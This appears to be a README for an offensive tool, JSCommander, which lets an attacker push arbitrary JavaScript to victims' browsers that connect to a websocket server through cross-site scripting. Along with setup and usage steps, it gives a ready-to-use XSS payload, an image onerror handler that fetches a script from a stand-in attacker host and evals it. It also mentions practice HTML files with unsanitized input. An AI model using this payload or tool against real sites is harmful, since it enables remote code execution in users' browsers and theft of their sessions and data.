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JSCommander

Issue JS commands remotely when clients connect to your attacker websocket server

Inspired by https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation

Install

python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt

Usage

Run the server

python3 JSCommnder-server.py

Control panel is only accessible from localhost on the machine you run me on. Available at http://localhost:8080/control_panel.html

You can use XSS payloads to connect to the websocket server. i.e:

<img src="#" onerror='fetch(`http://attacker.com:8081/payload.js`).then(res=>res.text().then(r=>eval(r)))' style="display:none" />

There are 2 testing HTML files to play with.

  • test_client.html simply connects to the webocket server upon opening it in your browser.
  • test_client2.html has an unsanitized input for practicing with XSS payloads.

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Remotely send JS to execute on clients that connect to your attacker websocket server via XSS.

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